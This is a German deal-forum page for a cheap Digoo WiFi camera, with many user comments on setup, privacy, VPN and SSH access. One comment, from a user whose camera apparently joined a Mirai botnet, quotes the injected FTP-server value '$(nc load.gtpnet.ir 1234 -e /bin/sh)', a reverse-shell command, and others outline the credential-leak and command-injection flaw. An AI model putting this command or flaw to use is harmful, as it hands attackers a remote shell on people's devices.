1194°
WLAN 720p Kamera mit IOS / Android Fernsteuerung - Vorbestellung bei Banggood ! Babyphone / Nachtsicht / Sicherheitskamera (Video-Anruf bei "Gast")
WLAN 720p Kamera mit IOS / Android Fernsteuerung - Vorbestellung bei Banggood ! Babyphone / Nachtsicht / Sicherheitskamera (Video-Anruf bei "Gast")

WLAN 720p Kamera mit IOS / Android Fernsteuerung - Vorbestellung bei Banggood ! Babyphone / Nachtsicht / Sicherheitskamera (Video-Anruf bei "Gast")

Preis:Preis:Preis:14,95€
Zum DealZum DealZum Deal

Bei Banggood kann man eine Wifi-Kamera ( Digoo-BB-M2 Mini ) vorbestellen, diese kann über Wifi das Signal auf einen PC / ein Handy (Android / IOS) übertragen oder auf einer Speicherkarte das Video speichern.
Aufnahmequalität ist in HD (720p - 1280x720 Pixel). Perfekt als Baby-"phone" bzw. als Sicherheitskamera (mit Nachtsicht-Funktion).
Sie kann z.B. per "Audio-Alarm" scharf-gestellt werden und benachrichtig einen dann auf dem Handy, dass jemand "zuhause" ist
Für knapp 15€ ist es vielleicht die Spielerei wert.

Dies ist nur eine Vorbestellung, die Kamera wird ab dem 22.11. ausgeliefert (nach der Vorbestellzeit wird sie vorraussichtlich 27€ kosten).
Banggood hat eine Lieferzeiten von 7-20 Tagen (kostenlos). Mit geringem Aufpreis auch schneller.

Alternativ auch in SCHWARZ:
banggood.com/Dig…112

Viel Spaß



Ps.: die Vorgängerversion (Link: banggood.com/Dig…tml ) kostet knapp 19€ und hat bei über 100 Bewertungen 4,9 von 5 Sternen!


853668.jpg

Beste Kommentare

Für die nächste Teilnahme an der DDOS Attacke auf DNS Anbieter sehr gut geeignet

2 bestellt. Werde mal den Traffic von dem Teil analysieren. Big Brother is watching you!

Der Deal ist sehr interessant

Ich betreibe inzwischen 5 China WLAN FullHD IPCAMs im Außenbereich (je für unter 50€ inkl. Versand) - hatte hier auch als Deal eingestellt: mydealz.de/dea…e=2

Egal ob SMART TV oder eben IPCAMs: Ich traue den Teilen nicht. Meine Lösung als Tipp: uPNP deaktivieren und für die Geräte das Internet im Router sperren. Bei mir laufen die IPCAM Streams über einen RaspberryPi bzw. BananaPi mit OpenVPN auf meinen Handys. Zumindest meine Kameras sind sehr gesprächig: Mit einem HTTP Request entlocke ich den Teilen mein unverschlüsseltes WLAN Passwort. Von daher erwarte ich nciht zuviel von den mitgelieferten Diensten.

Jungs nicht vergessen, wenn Ihr mehrere bestellt, schön einzeln bestellen, sonst wenn es beim Zoll landet, müsst ihr Einf.Steuer bezahlen.
382 Kommentare

Vielleicht ließt hier ja noch jemand.
Die Cam läuft, sendet aber, sobald eine Bewegung kommt nur Fotos an meinen NAS. Was muss ich tun, damit auch ein Video ab Trigger aufgenommen wird? Habe keine SD Karte im Slot, muss dafür eine drin sein zum zwischenspeichern?

Ich hoffe, ich bekomme hier noch eine Antwort

ich lese hier noch und habe die Kamera erst neulich bestellt. will die dann auch im NAS DS216j betreiben. helfen kann ich jedoch aktuell nicht

direkter Stream über den Browser (ohne Ton):

13836514-TMnmw.jpg
Um die CAM mit der qnap surveillance station zu verbinden, verwende ich folgende Einstellungen:
13836514-rmv89.jpg

und hier die Settings für die App "IP Cam Viewer"
13836514-1rNu6.jpg
Bearbeitet von: "loony1337" 14. Apr

Meine Kamera ist gehackt worden!
Die Telekom hat mir einen Brief geschrieben, dass hinter meinem DSL Anschluss ein mirai botnet läuft. Da ich zu dem angegebenen Zeitpunkt überhaupt nicht zu Hause war, konnte es nur diese Kamera sein. Gerade habe ich nachgeschaut und als FTP Server ist "$(nc load.gtpnet.ir 1234 -e /bin/sh)" eingetragen. Hab das Ding natürlich sofort vom Internet getrennt.
Wie sind die Verbrecher da rein gekommen? Das admin Passwort hatte ich selbstverständlich geändert. Wie werde ich den Mist jetzt wieder los und wie verhindere ich, dass das wieder passiert?

Krass

Update:
Die Probleme sind anscheinend bekannt (Google "Multiple vulnerabilities found in Wireless IP Camera"). Letztendlich kann man mit einem http Aufruf ein File downloaden, in dem Nutzernamen und Passwort im Klartext drin stehen. Wenn man das Login einmal hat, kann man über das gefälschte Setzen des FTP Servers im Web-Interface beliebigen Code ausführen (und natürlich auch das Kamerabild anschauen).

Die Kamera ist also immer wieder zu hacken (auch wenn das Passwort geändert wird) und gehört sofort in die Tonne!

Vivatvor 19 h, 35 m

Meine Kamera ist gehackt worden!...


Danke für die Info. Meine ist auch betroffen. Habe mir mal die Skripte angeguckt, sehr interessant. Leider ist die Binärdatei nicht wirklich lesbar
Ich hatte in meiner alle Ports UDP und alle Port TCP bis auf 81 und 10554 gesperrt. Jedoch habe ich diese Ports weitergeleitet, so dass ich Zugriff von draußen habe. Diesen werde ich nun auch sperren und nur per VPN darauf zugreifen. Mal gucken, ob die dann noch da rauf kommen.
Weiterhin ist wohl auch ein bisschen UPnP schuld, da ich dieses in der Fritzbox aktiviert habe und er sich somit einfach Ports öffnen kann.
Zudem habe ich die Domain beim iranischen Anbieter gemeldet (die IPs melden bringt wohl nichts, da die die sicherlich häufiger wechseln).
Doof bei der Cam ist auch, dass er nicht meinen DNS-Server als Haupt-DNS nutzt, sondern 8.8.8.8 (ist das Google?) und meinen als secondary. Somit bringt eine Webseitenfilter (Blacklist gtpnet.ir) gar nichts .

Ist das Problem behoben, wenn ich die Kamera vom Netz nehme oder bleiben Sachen in meinem Netzwerk? Bin in Netzwerksachen leider sehr laienhaft. Hatte bis jetzt lediglich die App genutzt.

laker122. Apr

Ist das Problem behoben, wenn ich die Kamera vom Netz nehme oder bleiben …Ist das Problem behoben, wenn ich die Kamera vom Netz nehme oder bleiben Sachen in meinem Netzwerk? Bin in Netzwerksachen leider sehr laienhaft. Hatte bis jetzt lediglich die App genutzt.


Wenn du unter den FTP-Einstellungen dieses Skript "$(nc load.gtpnet.ir ....)" siehst, dann bist du betroffen (sonst wahrscheinlich noch nicht.
Der "Wurm" ist wieder weg, wenn du die Kamera aus und wieder an machst, jedoch lädt er dann über die FTP-Einstellungen den "Wurm" erneut herunter. Daher hilft nur ein Reset (kleiner Knopf mit einer Nadel oder so am Kopf der Cam lange halten, bis die "Dame" Reset sagt). Danach ist der Wurm weg. Jedoch ist es sehr leicht, ihn wieder drauf zu bekommen (hierfür wird jedoch ein neuer Angriff benötigt),
Im Binärcode lässt sich bisschen lesen, dass der Wurm per "UPnP" versucht, andere Geräte zu finden. Darum auf jedenfall (wenn möglich) UPnP im Router deaktivieren (damit zumindest keine Ports geöffnet werden).
Ob andere Geräte betroffen sind, ist schwer zu sagen. Dieser wurm zielt speziell auf IP-Cams (Geräte mit einem unsicheren Linux Betriebssystem und arm, arm5, arm7, mips oder mpsl Prozessor bzw. Core) ab.
Wenn ich nicht falsch liegen, dann hat er bei mir auch ein Bild gemacht und dieses hoch geladen (lag im /tmp-Verzeichnis).
Leider weiß ich noch nicht wohin.
Zudem kannst du prüfen, ob dein Gerät in der Datenbank ist:
Gehe auf wieistmeineip.de und kopiere die IPV4-Adresse (z.B. 77.122.33.44).
Gehe dann auf shodan.io/ und trage dort die IP-Adresse in dem Suchfeld ein.
Hier steht für meine IP:
HTTP/1.1 401 Unauthorized
Server: GoAhead-Webs
Date: Mon Apr 3 15:04:01 2017
WWW-Authenticate: Digest realm="WIFICAM", domain=":81",qop="auth", nonce="d6e7f08d21a373046092b67d1132923a", opaque="5ccc069c403ebaf9f0171e9517f40e41",algorithm="MD5", stale="FALSE"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Und damit kann die "gefunden" werden

Also gibt es im Prinzip keine Möglichkeit die Kamera sicher zu verwenden wenn man ihr Zugriff zum Internet gewährt...

Cl25vor 1 h, 55 m

Also gibt es im Prinzip keine Möglichkeit die Kamera sicher zu verwenden …Also gibt es im Prinzip keine Möglichkeit die Kamera sicher zu verwenden wenn man ihr Zugriff zum Internet gewährt...


Sehe ich auch so. Deswegen hat sie bei mir auch keinen Zugriff. Wenn ich reinschauen will, dann verbinde ich mich mit meiner Fritzbox über vpn.

Man kann sich sehr einfach einen SSH-Tunnel zur Cam aufbauen, falls man bspw. einen Raspberry Pi im Netz hat (und SSH per Port Forwarding aus dem Internet erreichbar ist) oder die Fritzbox direkt aus dem Internet per SSH erreichbar ist.
Falls Interesse besteht, erklär ichs hier kurz. Neben dem Raspberry wird noch Software benötigt: Wenn man vom PC aus von außen auf die Cam zugreifen möchte, Putty. Vom Handy aus nutze ich die App Termius. JuiceSSH ist aber auch gut.

Alex.Kratzvor 4 h, 50 m

Man kann sich sehr einfach einen SSH-Tunnel zur Cam aufbauen, falls man …Man kann sich sehr einfach einen SSH-Tunnel zur Cam aufbauen, falls man bspw. einen Raspberry Pi im Netz hat (und SSH per Port Forwarding aus dem Internet erreichbar ist) oder die Fritzbox direkt aus dem Internet per SSH erreichbar ist.Falls Interesse besteht, erklär ichs hier kurz. Neben dem Raspberry wird noch Software benötigt: Wenn man vom PC aus von außen auf die Cam zugreifen möchte, Putty. Vom Handy aus nutze ich die App Termius. JuiceSSH ist aber auch gut.


Danke für dein Angebot, ich hätte Interesse an der Erklärung für die Lösung über die Fritzbox

Vielen Dank

Läuft auf deiner Fritzbox ein SSH-Server (zb. Dropbear) und ist dieser übers Internet erreichbar? Ich zitiere mich mal selbst: "oder die Fritzbox direkt aus dem Internet per SSH erreichbar ist." ;-)

xretikulumxvor 19 h, 43 m

Läuft auf deiner Fritzbox ein SSH-Server (zb. Dropbear) und ist dieser …Läuft auf deiner Fritzbox ein SSH-Server (zb. Dropbear) und ist dieser übers Internet erreichbar? Ich zitiere mich mal selbst: "oder die Fritzbox direkt aus dem Internet per SSH erreichbar ist." ;-)


Guten Morgen.
Noch läuft auf meiner Fritzbox 7362 sl nichts
Ich kann mich aber mal bezüglich Portfreigabe, Dropbear etc. informieren.

Gibt's da weitere Stichworte, nach denen ich suchen sollte?

Dankeschön

Ist die Lösung mit einer VPN Verbindung zur fritzbox nicht einfacher und sicherer? Es gibt Clients fürs Handy (bzw. Sind dabei) und dann kann man ohne extra Installation auf alles im LAN zugreifen, ohne einen Port weiterleiten zu müssen (und somit jemanden schon in dein LAN lassen)...

Sicherer nicht. Beides wird per RSA verschlüsselt. Einen Port weiterleiten heißt nur, dass ein sowieso vorhandener Port umgeleitet wird. "Offen" bedeutet, dass ein Dienst an einem spezifischen Port hört. Im Fall SSH ist das der Port 22. Durch Port-Forwarding allerdings dann auf einem von dir gewünschten Port (bspw. 65400). VPN hat auch genauso seinen eigenen Port (1194). Also ist das völlig irrelevant. Glaube mir, das Webinterface deiner Fritzbox auf Port 80 (bzw. 443 SSL) ist definitiv unsicherer ;-)

VPN ist in dem Sinne einfacher, da es direkt mit der Fritzbox machbar ist, da implementiert. Allerdings wird dann von außerhalb dein komplettes Handy in dein Netzwerk gehängt (du hast dann eine Netzwerk-interne IP-Adresse) und dein gesamter Datenverkehr darüber geleitet.
Per SSH-Tunnel kannst du einfach einen gewünschten Dienst in deinem Netzwerk ansprechen. Ist also entspannter und genauso sicher.

@Panama_943: Bspw. wäre Freetz eine Möglichkeit, Dropbear auf deine Box zu bringen. Ich allerdings habe einen Raspberry Pi im Netzwerk hängen. Dort laufen meine Server drauf, welche über Port Forwarding ansprechbar sind. Ich schreibe heute im Laufe des Tages mal eine kurze Anleitung.

Das stimmt leider nicht ganz. Die fritzbox benutzt für die vpn Verbindung genauso wie ssh kein rsa sonder AES für die Verschlüsselung. Zudem ist eine Vpn Verbindung mit der fritzbox 256 Bit verschlüsselt, eine ssh Verbindung nur mit 128bit.
Zudem ist der ssh Login ohne weiteres schutzprogramm relativ leicht durch brutforce zu hacken. Und wenn man mit ssh erst mal auf dem pi ist, dann ist Haus und Hof offen (also das gesamte Netzwerk inkl. aller Dienste).
Ich habe auf meinem Ssh Server diverse brutforce Attacken jeden Tag. Glücklicherweise nur mit dictionary attack.
Daher würde ich jedem noch zusätzlich fail2ban empfehlen. Das Block eine IP Adresse für x Minuten bei y fehl-logins über eine iptables rule. Somit kann immerhin nicht unendlich attackiert werden.
Weiterhin ist die fritzbox standardmäßig von außen nicht über port 80 oder 443 zu erreichen, sondern über einen individuellen port (einzustellen unter Internet>freigeben>fritzbox-dienste).
Auch läuft die vpn Verbindung der fritzbox nicht über port 1194 und erst recht nicht TCP, sonder esp und in udp packte eingekapselt. Dafür wird udp port 500 und 4500 verwendet.
Ich glaube jedoch, ein Angriff auf einen ssh Server per TCP ist einfacher zu gestalten, als ein Angriff von esp Paketen in eingekapselt udp Pakete, was somit eine Vpn Lösung sicherer macht...

Hey! Hat noch jemand das Problem, dass sich die Kamera nicht mehr einschalten lässt? Bzw sie gibt keinen Mucks mehr von sich, wenn sie mit dem Strom verbunden wird. Komischerweise ist das bei beiden Kameras gestern gleichzeitig passiert. Hat jemand ne Idee?

Edit: Habe mich beim Banggood Support gemeldet. Mir werden jetzt 2 neue M1X Kameras zugeschickt. Ist die neuere Version mit höherer Auflösung und zusätzlichem LAN Port. Mal sehen, wie lange die halten.
Bearbeitet von: "flowmow" 6. Jun

@theich:
Ah richtig. Fritzbox VPN = AES256. SSH übrigens auch AES in der Standard-Konfig. Ich nutze hier allerdings Blowfish mit 448 Bit.
Zum Thema Brute Force: 1. Mit einem Passwort, welches nicht-gleich "test123" lautet, sollte der Zugang sicher sein 2. Ich weiß nicht, was du für Attacken hast. Ich nutze natürlich Fail2Ban, ich habe aber null und gar keine Angriffe von außerhalb.

Habt ihr die cam eigtl. 24/7 in betrieb? Ein user hatte hier ja mal ne bild gepostet wo das ding am schmoren war, deswegen bin ich noch am überlegen

Crackorvor 7 m

Habt ihr die cam eigtl. 24/7 in betrieb? Ein user hatte hier ja mal ne …Habt ihr die cam eigtl. 24/7 in betrieb? Ein user hatte hier ja mal ne bild gepostet wo das ding am schmoren war, deswegen bin ich noch am überlegen


ja, das war ich, hab Ersatz geliefert bekommen. die neue habe ich noch nicht Mal angeschaltet. traue mich nicht. vielleicht lag es auch an der zu hohen Stromstärke des Ladegeräts, was aber trotzdem nicht passieren dürfte. wenn es so exakt sein muss, dann hätten sie gefälligst ein passendes dazu gelegt. aber ich habe es eher aus Datenschutzgründen nicht mehr im Betrieb. was ich hier alles gelesen habe...
bin zwar einigermaßen fit in dem Thema, aber gewisse Parameter, vorallem was Netzwerk betrifft, überschreiten meinen Horizont
Dein Kommentar
Avatar
@
    Text